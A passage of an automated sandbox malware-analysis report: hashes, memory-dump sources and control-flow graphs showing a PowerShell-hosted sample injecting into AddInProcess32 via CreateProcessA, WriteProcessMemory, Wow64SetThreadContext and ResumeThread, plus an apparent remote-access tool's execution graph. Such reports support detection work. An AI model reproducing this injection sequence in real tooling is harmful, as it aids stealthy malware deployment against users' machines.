                                                      • Source File: 00000010.00000002.2937213411.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000010.00000002.2937108954.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000010.00000002.2937213411.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_16_2_10000000_AddInProcess32.jbxd
                                                      Similarity
                                                      • API ID: Exception@8Throw$ExceptionRaise
                                                      • String ID: Unknown exception
                                                      • API String ID: 3476068407-410509341
                                                      • Opcode ID: 00f05d2547b3034e4c7bbe2eae49a616f435d37e9c126e5e725cfb9fdfb6d2bb
                                                      • Instruction ID: 696891806b75a506f07e96a947ab79166ff1ea0d2f17bc9dac180a151cc952bd
                                                      • Opcode Fuzzy Hash: 00f05d2547b3034e4c7bbe2eae49a616f435d37e9c126e5e725cfb9fdfb6d2bb
                                                      • Instruction Fuzzy Hash: 2BF0A47890420D77AB04E6E5EC4599D77ACDB006D0F508161FD1496499EF31FA658690

                                                      Execution Graph

                                                      Execution Coverage:4.9%
                                                      Dynamic/Decrypted Code Coverage:0%
                                                      Signature Coverage:0%
                                                      Total number of Nodes:13
                                                      Total number of Limit Nodes:0
                                                      execution_graph 3460 7ff848d49fcd 3461 7ff848d49fdb ResumeThread 3460->3461 3463 7ff848d4a096 3461->3463 3464 7ff848d4a0c8 3465 7ff848d4a0d1 Wow64SetThreadContext 3464->3465 3467 7ff848d4a194 3465->3467 3468 7ff848d4a2d4 3469 7ff848d4a2dd WriteProcessMemory 3468->3469 3471 7ff848d4a3d6 3469->3471 3472 7ff848d4a634 3473 7ff848d4a63d 3472->3473 3473->3473 3474 7ff848d4a953 CreateProcessA 3473->3474 3475 7ff848d4a9df 3474->3475

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 0 7ff848e111cc-7ff848e11219 3 7ff848e113aa-7ff848e1145b 0->3 4 7ff848e1121f-7ff848e11229 0->4 54 7ff848e1145d 3->54 55 7ff848e11462-7ff848e11473 3->55 5 7ff848e1122b-7ff848e11240 4->5 6 7ff848e11242-7ff848e11247 4->6 5->6 9 7ff848e1124d-7ff848e11250 6->9 10 7ff848e11347-7ff848e11351 6->10 12 7ff848e11299 9->12 13 7ff848e11252-7ff848e11265 9->13 14 7ff848e11362-7ff848e113a7 10->14 15 7ff848e11353-7ff848e11361 10->15 16 7ff848e1129b-7ff848e1129d 12->16 13->3 26 7ff848e1126b-7ff848e11275 13->26 14->3 16->10 20 7ff848e112a3-7ff848e112a6 16->20 23 7ff848e112a8-7ff848e112b1 20->23 24 7ff848e112bd-7ff848e112c1 20->24 23->24 24->10 32 7ff848e112c7-7ff848e112cd 24->32 30 7ff848e1128e-7ff848e11297 26->30 31 7ff848e11277-7ff848e11284 26->31 30->16 31->30 38 7ff848e11286-7ff848e1128c 31->38 36 7ff848e112e9-7ff848e112ef 32->36 37 7ff848e112cf-7ff848e112dc 32->37 41 7ff848e1130b-7ff848e1131e 36->41 42 7ff848e112f1-7ff848e11309 36->42 37->36 43 7ff848e112de-7ff848e112e7 37->43 38->30 49 7ff848e11320-7ff848e11335 41->49 50 7ff848e11337-7ff848e11346 41->50 42->41 43->36 49->50 54->55 56 7ff848e1145f 54->56 57 7ff848e1147a-7ff848e114c0 55->57 58 7ff848e11475 55->58 56->55 61 7ff848e114c2 57->61 62 7ff848e11536-7ff848e1153f 57->62 58->57 59 7ff848e11477 58->59 59->57 61->62 64 7ff848e11634-7ff848e1163e 62->64 65 7ff848e11545-7ff848e11548 62->65 66 7ff848e11640-7ff848e11650 64->66 67 7ff848e11651-7ff848e1169c 64->67 68 7ff848e1154a-7ff848e1155d 65->68 69 7ff848e11591 65->69 76 7ff848e1169f-7ff848e1174d 67->76 68->76 77 7ff848e11563-7ff848e1156d 68->77 70 7ff848e11593-7ff848e11595 69->70 70->64 72 7ff848e1159b-7ff848e1159e 70->72 72->64 74 7ff848e115a4-7ff848e115a7 72->74 74->64 78 7ff848e115ad-7ff848e115e1 74->78 102 7ff848e11759-7ff848e11765 76->102 103 7ff848e1174f-7ff848e11755 76->103 79 7ff848e1156f-7ff848e11584 77->79 80 7ff848e11586-7ff848e1158f 77->80 78->64 93 7ff848e115e3-7ff848e115e9 78->93 79->80 80->70 94 7ff848e11608-7ff848e1161e 93->94 95 7ff848e115eb-7ff848e11606 93->95 98 7ff848e11624-7ff848e11633 94->98 95->94 104 7ff848e11771-7ff848e117b8 102->104 105 7ff848e11767-7ff848e1176d 102->105 103->102 107 7ff848e117ba 104->107 108 7ff848e1182e-7ff848e11838 104->108 105->104 107->108
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.2870926570.00007FF848E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_19_2_7ff848e10000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: N_H
                                                      • API String ID: 0-3960352562
                                                      • Opcode ID: d6aea04ed0a29da1325f463f24f80eb601683df191d0a7c186b1654ce0e24082
                                                      • Instruction ID: 4ea40a8b32866a87b0645131de6aafd535e0e9abe6b9079f9bab3a89136c8a1c
                                                      • Opcode Fuzzy Hash: d6aea04ed0a29da1325f463f24f80eb601683df191d0a7c186b1654ce0e24082
                                                      • Instruction Fuzzy Hash: 11123531E0EB894FE7D6AA2858551B47BE1FF46260F0901FFC44DC7193EE2A9C468396

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 109 7ff848d4a634-7ff848d4a63b 110 7ff848d4a63d-7ff848d4a645 109->110 111 7ff848d4a646-7ff848d4a714 109->111 110->111 115 7ff848d4a716-7ff848d4a725 111->115 116 7ff848d4a772-7ff848d4a7a4 111->116 115->116 117 7ff848d4a727-7ff848d4a72a 115->117 123 7ff848d4a7a6-7ff848d4a7b5 116->123 124 7ff848d4a802-7ff848d4a876 116->124 118 7ff848d4a72c-7ff848d4a73f 117->118 119 7ff848d4a764-7ff848d4a76c 117->119 121 7ff848d4a741 118->121 122 7ff848d4a743-7ff848d4a756 118->122 119->116 121->122 122->122 125 7ff848d4a758-7ff848d4a760 122->125 123->124 126 7ff848d4a7b7-7ff848d4a7ba 123->126 130 7ff848d4a878-7ff848d4a887 124->130 131 7ff848d4a8d4-7ff848d4a9dd CreateProcessA 124->131 125->119 128 7ff848d4a7bc-7ff848d4a7cf 126->128 129 7ff848d4a7f4-7ff848d4a7fc 126->129 132 7ff848d4a7d1 128->132 133 7ff848d4a7d3-7ff848d4a7e6 128->133 129->124 130->131 135 7ff848d4a889-7ff848d4a88c 130->135 144 7ff848d4a9df 131->144 145 7ff848d4a9e5-7ff848d4aa13 131->145 132->133 133->133 134 7ff848d4a7e8-7ff848d4a7f0 133->134 134->129 136 7ff848d4a88e-7ff848d4a8a1 135->136 137 7ff848d4a8c6-7ff848d4a8ce 135->137 139 7ff848d4a8a5-7ff848d4a8b8 136->139 140 7ff848d4a8a3 136->140 137->131 139->139 142 7ff848d4a8ba-7ff848d4a8c2 139->142 140->139 142->137 144->145
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.2863926330.00007FF848D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_19_2_7ff848d40000_powershell.jbxd
                                                      Similarity
                                                      • API ID: CreateProcess
                                                      • String ID:
                                                      • API String ID: 963392458-0
                                                      • Opcode ID: 58f547edfce2b45c27aad1362115fb2ad7c10e5ff53f6153b7c709968611bb06
                                                      • Instruction ID: 6b668bee3f25e312f61911de0bfe7433c2dd66199047dfee782f0d9877416df4
                                                      • Opcode Fuzzy Hash: 58f547edfce2b45c27aad1362115fb2ad7c10e5ff53f6153b7c709968611bb06
                                                      • Instruction Fuzzy Hash: A1C19430918A8D8FDBB4EF18DC467E977E1FB58710F14422AD84EC7291DF74A9858B82

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 148 7ff848d4a2d4-7ff848d4a2db 149 7ff848d4a2dd-7ff848d4a2e5 148->149 150 7ff848d4a2e6-7ff848d4a2fa 148->150 149->150 151 7ff848d4a2fc-7ff848d4a341 150->151 152 7ff848d4a344-7ff848d4a375 150->152 151->152 155 7ff848d4a37f-7ff848d4a3d4 WriteProcessMemory 152->155 156 7ff848d4a377-7ff848d4a37c 152->156 158 7ff848d4a3dc-7ff848d4a40d 155->158 159 7ff848d4a3d6 155->159 156->155 159->158
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.2863926330.00007FF848D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_19_2_7ff848d40000_powershell.jbxd
                                                      Similarity
                                                      • API ID: MemoryProcessWrite
                                                      • String ID:
                                                      • API String ID: 3559483778-0
                                                      • Opcode ID: fb39db4ea0b428d9a7655a0755c492913f11a6c3f539615f8e39ec8aac6499c1
                                                      • Instruction ID: 40437e53a5322ab8ad9325ff5e5baad0b5b6ae94bb2599570ee7bb85c8b0f43b
                                                      • Opcode Fuzzy Hash: fb39db4ea0b428d9a7655a0755c492913f11a6c3f539615f8e39ec8aac6499c1
                                                      • Instruction Fuzzy Hash: 7841E431D0DB488FDB58AB9898466FD7BE0FB55710F00426FE449D3282DF74A8498B95

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 161 7ff848d4a0c8-7ff848d4a0cf 162 7ff848d4a0da-7ff848d4a0ea 161->162 163 7ff848d4a0d1-7ff848d4a0d9 161->163 164 7ff848d4a0ec-7ff848d4a132 162->164 165 7ff848d4a134-7ff848d4a14d 162->165 163->162 164->165 168 7ff848d4a14f-7ff848d4a154 165->168 169 7ff848d4a157-7ff848d4a192 Wow64SetThreadContext 165->169 168->169 172 7ff848d4a19a-7ff848d4a1c9 169->172 173 7ff848d4a194 169->173 173->172
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.2863926330.00007FF848D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_19_2_7ff848d40000_powershell.jbxd
                                                      Similarity
                                                      • API ID: ContextThreadWow64
                                                      • String ID:
                                                      • API String ID: 983334009-0
                                                      • Opcode ID: 18b001e99d7dd2c7d42079b4400928f17cfae0d39356ab6eb038021d0b34d464
                                                      • Instruction ID: f4dbee058f101d9d22da683ca0cf31c3934b8b7e4bf49562e60dec22ede115b5
                                                      • Opcode Fuzzy Hash: 18b001e99d7dd2c7d42079b4400928f17cfae0d39356ab6eb038021d0b34d464
                                                      • Instruction Fuzzy Hash: 70310831D0DB584FEB28AFA898466FA7BE1EB55311F04423FD04AD3282DF74684A8795

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 175 7ff848d49fcd-7ff848d49fd9 176 7ff848d49fdb-7ff848d49fe3 175->176 177 7ff848d49fe4-7ff848d49ff3 175->177 176->177 178 7ff848d49ffe-7ff848d4a00a 177->178 179 7ff848d49ff5-7ff848d49ffd 177->179 180 7ff848d4a00c-7ff848d4a053 178->180 181 7ff848d4a054-7ff848d4a094 ResumeThread 178->181 179->178 180->181 186 7ff848d4a09c-7ff848d4a0c1 181->186 187 7ff848d4a096 181->187 187->186
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.2863926330.00007FF848D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_19_2_7ff848d40000_powershell.jbxd
                                                      Similarity
                                                      • API ID: ResumeThread
                                                      • String ID:
                                                      • API String ID: 947044025-0
                                                      • Opcode ID: 606c6ea843e159599c439ee8a27781a2840e62fb11a8b12b5b07967c7fc4f7cd
                                                      • Instruction ID: 392896984da698592b0253c565b76735167ba4696bb09b644d0ae5d980b4ebda
                                                      • Opcode Fuzzy Hash: 606c6ea843e159599c439ee8a27781a2840e62fb11a8b12b5b07967c7fc4f7cd
                                                      • Instruction Fuzzy Hash: 7431283190D7888FDB5ADB6898567F97FE0EF56320F0442AFC049C7197CB686405C795

                                                      Control-flow Graph

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.2870926570.00007FF848E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_19_2_7ff848e10000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: N_H
                                                      • API String ID: 0-3960352562
                                                      • Opcode ID: aab5a9f74f645cf613c584d9750d614d60a82e948801458dfcee37939890cd5f
                                                      • Instruction ID: e70b3b2313fe7aa96576a812549cd66575a443de5631905d360aa4883448e6c6
                                                      • Opcode Fuzzy Hash: aab5a9f74f645cf613c584d9750d614d60a82e948801458dfcee37939890cd5f
                                                      • Instruction Fuzzy Hash: E3917631D0EBC94FE796AB2858551B47FE1FF46260F0801FED44ECB193DA2A9C0A8356

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 245 7ff848e104da-7ff848e104df 246 7ff848e10521-7ff848e1053a 245->246 247 7ff848e104e1-7ff848e10519 245->247 249 7ff848e1053c-7ff848e1056a 246->249 250 7ff848e10584 246->250 247->246 251 7ff848e104b0-7ff848e104ce 247->251 254 7ff848e10570-7ff848e1057a 249->254 255 7ff848e106d7-7ff848e10717 249->255 253 7ff848e10585-7ff848e10589 250->253 251->245 256 7ff848e1058b-7ff848e10591 253->256 257 7ff848e10593-7ff848e10598 253->257 254->257 258 7ff848e1057c-7ff848e10583 254->258 275 7ff848e10719-7ff848e10754 255->275 276 7ff848e106ae-7ff848e106d4 255->276 256->257 259 7ff848e1059e-7ff848e105a1 257->259 260 7ff848e10670-7ff848e1067a 257->260 258->250 258->253 259->260 261 7ff848e105a7-7ff848e105aa 259->261 264 7ff848e1068b-7ff848e106a9 260->264 265 7ff848e1067c-7ff848e1068a 260->265 266 7ff848e105ac-7ff848e105b5 261->266 267 7ff848e105c1-7ff848e105c5 261->267 264->276 266->267 267->260 274 7ff848e105cb-7ff848e105ce 267->274 277 7ff848e105d0-7ff848e105e3 274->277 278 7ff848e105e5 274->278 290 7ff848e10755-7ff848e10787 275->290 276->255 280 7ff848e105e7-7ff848e105e9 277->280 278->280 280->260 283 7ff848e105ef-7ff848e105f5 280->283 284 7ff848e10611-7ff848e10617 283->284 285 7ff848e105f7-7ff848e10604 283->285 287 7ff848e10619-7ff848e10631 284->287 288 7ff848e10633-7ff848e10637 284->288 285->284 291 7ff848e10606-7ff848e1060f 285->291 287->288 294 7ff848e1063e-7ff848e10647 288->294 303 7ff848e10789 290->303 304 7ff848e1078e-7ff848e1079f 290->304 291->284 297 7ff848e10649-7ff848e10656 294->297 298 7ff848e10660-7ff848e1066f 294->298 297->298 301 7ff848e10658-7ff848e1065e 297->301 301->298 303->304 306 7ff848e1078b 303->306 307 7ff848e107a1 304->307 308 7ff848e107a6-7ff848e107c1 304->308 306->304 307->308 309 7ff848e107a3 307->309 308->290 309->308
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.2870926570.00007FF848E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_19_2_7ff848e10000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d2efe5c166cb9a6e7819e0b5a15c16b73c51e6a8963bc68c0706ea8c11911d97
                                                      • Instruction ID: 0550e57c19216e6bef3b8b0bb243f0f81c4bbf9b26f560f20e8abb13c09111e8
                                                      • Opcode Fuzzy Hash: d2efe5c166cb9a6e7819e0b5a15c16b73c51e6a8963bc68c0706ea8c11911d97
                                                      • Instruction Fuzzy Hash: B8B15822E0DB9A5FE3E6B62858151B47BD0FF96360F0801FBD44DC7593DE28AC468396

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 357 7ff848e10a80-7ff848e10aa0 358 7ff848e10aa2 357->358 359 7ff848e10b16-7ff848e10b1b 357->359 358->359 360 7ff848e10baa-7ff848e10bb4 359->360 361 7ff848e10b21-7ff848e10b24 359->361 364 7ff848e10bc3-7ff848e10c06 360->364 365 7ff848e10bb6-7ff848e10bc2 360->365 362 7ff848e10b4b 361->362 363 7ff848e10b26-7ff848e10b49 361->363 367 7ff848e10b4d-7ff848e10b4f 362->367 363->367 367->360 369 7ff848e10b51-7ff848e10b5b 367->369 369->360 374 7ff848e10b5d-7ff848e10b67 369->374 375 7ff848e10b69-7ff848e10b73 374->375 376 7ff848e10b7a-7ff848e10b83 375->376 377 7ff848e10b9c-7ff848e10ba9 376->377 378 7ff848e10b85-7ff848e10b92 376->378 378->377 380 7ff848e10b94-7ff848e10b9a 378->380 380->377
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.2870926570.00007FF848E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_19_2_7ff848e10000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e16c6a0463562dde5e230872aba9644824efbc9a6f300170588d78be4704596b
                                                      • Instruction ID: 6caacbc7fc5f911fc56a3c9cdc37ae56ad45f1fe38331c8263064e1767fc1500
                                                      • Opcode Fuzzy Hash: e16c6a0463562dde5e230872aba9644824efbc9a6f300170588d78be4704596b
                                                      • Instruction Fuzzy Hash: 7F412532B1EBAA4FE7E6B62818655B477E0FF46694B0800BBC44DC7193DF189C058795

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 382 7ff848e10ade-7ff848e10af4 383 7ff848e10b0d-7ff848e10b12 382->383 384 7ff848e10af6-7ff848e10b03 382->384 385 7ff848e10b18-7ff848e10b1b 383->385 386 7ff848e10baa-7ff848e10bb4 383->386 384->383 391 7ff848e10b05-7ff848e10b0b 384->391 385->386 388 7ff848e10b21-7ff848e10b24 385->388 389 7ff848e10bc3-7ff848e10c06 386->389 390 7ff848e10bb6-7ff848e10bc2 386->390 393 7ff848e10b4b 388->393 394 7ff848e10b26-7ff848e10b49 388->394 391->383 396 7ff848e10b4d-7ff848e10b4f 393->396 394->396 396->386 399 7ff848e10b51-7ff848e10b5b 396->399 399->386 403 7ff848e10b5d-7ff848e10b73 399->403 405 7ff848e10b7a-7ff848e10b83 403->405 406 7ff848e10b9c-7ff848e10ba9 405->406 407 7ff848e10b85-7ff848e10b92 405->407 407->406 409 7ff848e10b94-7ff848e10b9a 407->409 409->406
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.2870926570.00007FF848E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_19_2_7ff848e10000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 878b66837d1b93f6e9211664c3b741a8951af99a6642590be135fe42c51208e2
                                                      • Instruction ID: 4a12056519ad8334f7f48f5317dddf4c6c93c06fe2a7bb4be8391e2b43d9fb84
                                                      • Opcode Fuzzy Hash: 878b66837d1b93f6e9211664c3b741a8951af99a6642590be135fe42c51208e2
                                                      • Instruction Fuzzy Hash: 09314722F1EE6A4FF7F5B6381418AB9A7C0FF44799F480179C44EC3186EF28AC044695

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 411 7ff848e105b9-7ff848e105c5 413 7ff848e105cb-7ff848e105ce 411->413 414 7ff848e10670-7ff848e1067a 411->414 415 7ff848e105d0-7ff848e105e3 413->415 416 7ff848e105e5 413->416 417 7ff848e1068b-7ff848e106a9 414->417 418 7ff848e1067c-7ff848e1068a 414->418 419 7ff848e105e7-7ff848e105e9 415->419 416->419 430 7ff848e106ae-7ff848e10717 417->430 419->414 422 7ff848e105ef-7ff848e105f5 419->422 424 7ff848e10611-7ff848e10617 422->424 425 7ff848e105f7-7ff848e10604 422->425 426 7ff848e10619-7ff848e10631 424->426 427 7ff848e10633-7ff848e10637 424->427 425->424 429 7ff848e10606-7ff848e1060f 425->429 426->427 432 7ff848e1063e-7ff848e10647 427->432 429->424 444 7ff848e10719-7ff848e10754 430->444 436 7ff848e10649-7ff848e10656 432->436 437 7ff848e10660-7ff848e1066f 432->437 436->437 440 7ff848e10658-7ff848e1065e 436->440 440->437 448 7ff848e10755-7ff848e10787 444->448 452 7ff848e10789 448->452 453 7ff848e1078e-7ff848e1079f 448->453 452->453 454 7ff848e1078b 452->454 455 7ff848e107a1 453->455 456 7ff848e107a6-7ff848e107c1 453->456 454->453 455->456 457 7ff848e107a3 455->457 456->448 457->456
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.2870926570.00007FF848E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_19_2_7ff848e10000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 57404f4327293ed0ee1825f22e8472d4fef7aaa06856c9bdae25380b0918e20c
                                                      • Instruction ID: 78975ac7e727f4bcc5ad561615904e412aa2ab4ee1b2f79fba1e9d1537a13d3a
                                                      • Opcode Fuzzy Hash: 57404f4327293ed0ee1825f22e8472d4fef7aaa06856c9bdae25380b0918e20c
                                                      • Instruction Fuzzy Hash: 71113A52F2EE7A5FF2F5B62C2819178A5C1FF84BA0F4801BAD41DC35C6DE18AC01029D

                                                      Execution Graph

                                                      Execution Coverage:1.2%
                                                      Dynamic/Decrypted Code Coverage:0%
                                                      Signature Coverage:2.2%
                                                      Total number of Nodes:550
                                                      Total number of Limit Nodes:10
                                                      execution_graph 47136 404e26 WaitForSingleObject 47137 404e40 SetEvent CloseHandle 47136->47137 47138 404e57 closesocket 47136->47138 47139 404ed8 47137->47139 47140 404e64 47138->47140 47141 404e7a 47140->47141 47149 4050e4 83 API calls 47140->47149 47142 404e8c WaitForSingleObject 47141->47142 47143 404ece SetEvent CloseHandle 47141->47143 47150 41e7a2 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 47142->47150 47143->47139 47146 404e9b SetEvent WaitForSingleObject 47151 41e7a2 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 47146->47151 47148 404eb3 SetEvent CloseHandle CloseHandle 47148->47143 47149->47141 47150->47146 47151->47148 47152 434918 47153 434924 ___FrameUnwindToState 47152->47153 47178 434627 47153->47178 47155 43492b 47157 434954 47155->47157 47473 434a8a IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_get_show_window_mode 47155->47473 47158 434993 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 47157->47158 47474 4442d2 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 47157->47474 47163 4349f3 47158->47163 47476 443487 35 API calls 5 library calls 47158->47476 47160 43496d 47162 434973 ___FrameUnwindToState 47160->47162 47475 444276 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 47160->47475 47189 434ba5 47163->47189 47173 434a1f 47175 434a28 47173->47175 47477 443462 28 API calls _abort 47173->47477 47478 43479e 13 API calls 2 library calls 47175->47478 47179 434630 47178->47179 47479 434cb6 IsProcessorFeaturePresent 47179->47479 47181 43463c 47480 438fb1 10 API calls 4 library calls 47181->47480 47183 434641 47184 434645 47183->47184 47481 44415f 47183->47481 47184->47155 47187 43465c 47187->47155 47547 436f10 47189->47547 47192 4349f9 47193 444223 47192->47193 47549 44f0d9 47193->47549 47195 434a02 47198 40ea00 47195->47198 47196 44422c 47196->47195 47553 446895 35 API calls 47196->47553 47555 41cbe1 LoadLibraryA GetProcAddress 47198->47555 47200 40ea1c GetModuleFileNameW 47560 40f3fe 47200->47560 47202 40ea38 47575 4020f6 47202->47575 47205 4020f6 28 API calls 47206 40ea56 47205->47206 47581 41beac 47206->47581 47210 40ea68 47607 401e8d 47210->47607 47212 40ea71 47213 40ea84 47212->47213 47214 40eace 47212->47214 47637 40fbee 116 API calls 47213->47637 47613 401e65 22 API calls 47214->47613 47217 40eade 47614 401e65 22 API calls 47217->47614 47218 40ea96 47638 401e65 22 API calls 47218->47638 47220 40eaa2 47639 410f72 36 API calls __EH_prolog 47220->47639 47222 40eafd 47615 40531e 28 API calls 47222->47615 47225 40eab4 47640 40fb9f 77 API calls 47225->47640 47226 40eb0c 47616 406383 28 API calls 47226->47616 47229 40eb18 47617 401fe2 47229->47617 47230 40eabd 47641 40f3eb 70 API calls 47230->47641 47236 401fd8 11 API calls 47238 40ef36 47236->47238 47237 401fd8 11 API calls 47239 40eb36 47237->47239 47468 443396 GetModuleHandleW 47238->47468 47629 401e65 22 API calls 47239->47629 47241 40eb3f 47630 401fc0 28 API calls 47241->47630 47243 40eb4a 47631 401e65 22 API calls 47243->47631 47245 40eb63 47632 401e65 22 API calls 47245->47632 47247 40eb7e 47248 40ebe9 47247->47248 47642 406c59 28 API calls 47247->47642 47633 401e65 22 API calls 47248->47633 47251 40ebab 47252 401fe2 28 API calls 47251->47252 47253 40ebb7 47252->47253 47256 401fd8 11 API calls 47253->47256 47254 40ebf6 47255 40ec3d 47254->47255 47644 413584 RegOpenKeyExA RegQueryValueExA RegCloseKey 47254->47644 47634 40d0a4 47255->47634 47258 40ebc0 47256->47258 47643 413584 RegOpenKeyExA RegQueryValueExA RegCloseKey 47258->47643 47259 40ec43 47260 40eac6 47259->47260 47646 41b354 33 API calls 47259->47646 47260->47236 47264 40ebdf 47264->47248 47265 40f38a 47264->47265 47729 4139e4 30 API calls 47265->47729 47266 40ec5e 47268 40ecb1 47266->47268 47647 407751 RegOpenKeyExA RegQueryValueExA RegCloseKey 47266->47647 47267 40ec21 47267->47255 47645 4139e4 30 API calls 47267->47645 47652 401e65 22 API calls 47268->47652 47273 40f3a0 47730 4124b0 65 API calls ___scrt_get_show_window_mode 47273->47730 47274 40ecba 47281 40ecc6 47274->47281 47282 40eccb 47274->47282 47275 40ec79 47276 40ec87 47275->47276 47277 40ec7d 47275->47277 47650 401e65 22 API calls 47276->47650 47648 407773 30 API calls 47277->47648 47653 407790 CreateProcessA CloseHandle CloseHandle ___scrt_get_show_window_mode 47281->47653 47654 401e65 22 API calls 47282->47654 47283 40ec82 47649 40729b 97 API calls 47283->47649 47288 40f3ba 47732 413a5e RegOpenKeyExW RegDeleteValueW 47288->47732 47289 40ecd4 47655 41bcef 28 API calls 47289->47655 47291 40ec90 47291->47268 47295 40ecac 47291->47295 47292 40ecdf 47656 401f13 28 API calls 47292->47656 47651 40729b 97 API calls 47295->47651 47296 40f3cd 47733 401f09 11 API calls 47296->47733 47297 40ecea 47657 401f09 11 API calls 47297->47657 47301 40f3d7 47734 401f09 11 API calls 47301->47734 47303 40ecf3 47658 401e65 22 API calls 47303->47658 47304 40f3e0 47735 40dd7d 27 API calls 47304->47735 47307 40ecfc 47659 401e65 22 API calls 47307->47659 47308 40f3e5 47736 414f65 167 API calls _strftime 47308->47736 47312 40ed16 47660 401e65 22 API calls 47312->47660 47314 40ed30 47661 401e65 22 API calls 47314->47661 47316 40ed49 47317 40edbb 47316->47317 47662 401e65 22 API calls 47316->47662 47318 40edc5 47317->47318 47325 40ef41 ___scrt_get_show_window_mode 47317->47325 47320 40edce 47318->47320 47326 40ee4a 47318->47326 47668 401e65 22 API calls 47320->47668 47322 40edd7 47669 401e65 22 API calls 47322->47669 47323 40ed5e _wcslen 47323->47317 47663 401e65 22 API calls 47323->47663 47679 413733 RegOpenKeyExA RegQueryValueExA RegCloseKey 47325->47679 47350 40ee45 ___scrt_get_show_window_mode 47326->47350 47328 40ede9 47670 401e65 22 API calls 47328->47670 47329 40ed79 47664 401e65 22 API calls 47329->47664 47333 40edfb 47671 401e65 22 API calls 47333->47671 47334 40ed8e 47665 40da6f 31 API calls 47334->47665 47335 40ef8c 47680 401e65 22 API calls 47335->47680 47338 40ee24 47672 401e65 22 API calls 47338->47672 47339 40efb1 47681 402093 28 API calls 47339->47681 47341 40eda1 47666 401f13 28 API calls 47341->47666 47343 40edad 47667 401f09 11 API calls 47343->47667 47347 40ee35 47673 40ce34 45 API calls _wcslen 47347->47673 47348 40efc3 47682 4137aa 14 API calls 47348->47682 47349 40edb6 47349->47317 47350->47326 47674 413982 31 API calls 47350->47674 47354 40eede ctype 47675 401e65 22 API calls 47354->47675 47355 40efd9 47683 401e65 22 API calls 47355->47683 47357 40efe5 47684 43bb2c 39 API calls _strftime 47357->47684 47360 40eff2 47362 40f01f 47360->47362 47685 41ce2c 86 API calls ___scrt_get_show_window_mode 47360->47685 47361 40eef5 47361->47335 47676 401e65 22 API calls 47361->47676 47686 402093 28 API calls 47362->47686 47365 40ef12 47677 41bcef 28 API calls 47365->47677 47366 40f003 CreateThread 47366->47362 47834 41d4ee 10 API calls 47366->47834 47369 40ef1e 47678 40f4af 103 API calls 47369->47678 47370 40f034 47687 402093 28 API calls 47370->47687 47373 40f043 47688 41b580 79 API calls 47373->47688 47374 